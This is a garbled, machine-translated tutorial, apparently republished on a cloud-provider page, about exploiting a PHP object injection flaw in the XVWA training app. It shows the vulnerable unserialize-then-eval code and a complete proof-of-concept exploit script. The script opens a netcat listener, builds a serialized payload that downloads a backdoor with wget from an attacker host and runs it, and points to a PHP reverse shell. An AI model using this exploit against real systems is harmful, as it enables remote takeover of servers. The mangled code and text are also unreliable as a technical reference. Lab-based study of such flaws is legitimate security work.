PHP serialization/object Injection Vulnerability Analysis PHP Object-oriented programming PHP object-oriented PHP object-oriented real

Source: Internet
Author: User
Tags learn php learn php programming
This article is a short story about PHP serialization/object Injection Vulnerability Analysis, which describes how to get a remote shell for a host.

If you want to test this vulnerability yourself, you can do so through XVWA and Kevgir.

The first step in exploiting the exploits, we begin to test whether the target application has PHP serialization. In order to assist the test, we used the Burpsuite superserial plugin, download the address here. It will passively detect the existence of PHP and Java serialization.

Analysis
We have detected that PHP serialization is used in the application, so we can start to verify that the application code contains a remote code execution vulnerability. It is important to note that the serialized object is taken from the parameter "R":

$var 1=unserialize ($_request[' R ');
The deserialization and Eval are then performed:

Eval ($this->inject);
Next, execute:

echo "
". $var 1[0]."-". $var 1[1];
With these, if we bypass the PHP serialization object of parameter R, then we can get the code execution vulnerability!

< PHP   error_reporting (e_all);  Class phpobjectinjection{public    $inject;     function __construct () {     }     function __wakeup () {      if (isset ($this->inject)) {        eval ($this- inject);}}}  R=a:2:{i:0;s:4: "Xvwa"; i:1;s:33: "Xtremevulnerable Web Application";}  if (Isset ($_request[' R '))) {      $var 1=unserialize ($_request[' R ']);         if (Is_array ($var 1)) {       echo "". $var 1[0]. "-". $var 1[1];    }  } else{    echo "parameter is missing";  }? >

Exploit exploits
To exploit this vulnerability, we created a simple PHP script that automatically generated the PHP serialization payload and ran the command we wanted on the target remote host. Then I created a generic PHP bounce shell, with the following download addresses:

Http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: You need to upload this file to the Web server, change the local IP and port in the bounce shell script, and use the following code:

<?php/*php Object Injection POC Exploit by 1n3@crowdshield-https://crowdshield.coma simple PoC to Exploit PHP object Injections flaws and gain remote shell access. Shouts to @jstnkndy @yappare for theassist! Note:this Requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote Host with a connect back IP configured*/print "====================================================================== ========\r\n ";p rint" PHP Object injection Pocexploit by 1n3 @CrowdShield-https://crowdshield.com\r\n ";p rint" ========= =====================================================================\r\n ";p rint" [+] Generating Serializedpayload ... [ok]\r\n ";p rint" [+] launching Reverselistener ... [ok]\r\n]; system (' Gnome-terminal-x sh-c \ ' nc-lvvp1234\ '); class phpobjectinjection{//change url/filename to MATCH you R SETUP Public $inject = "System (' wget Http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php Phpobjbackdoor.php '); ";} $url = ' Http://taRgeturl/xvwa/vulnerabilities/php_object_injection/?r= '; Change Totarget Url/parameter$url = $url. UrlEncode (Serialize (newphpobjectinjection));p rint "[+] sendingexploit ... [ok]\r\n ";p rint" [+] dropping down tointeractive shell ... [ok]\r\n ";p rint" ==============================================================================\r\n "; $response = File_get_contents ("$url");? >

Demo
Now that we have the script ready, we can execute it to get a bounce shell on the remote host to execute the command remotely!

The above is the whole content of this article, I hope that you learn PHP programming help.

The above describes the PHP serialization/object Injection vulnerability analysis, including PHP, object aspects of the content, I hope the PHP tutorial interested in a friend helpful.

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.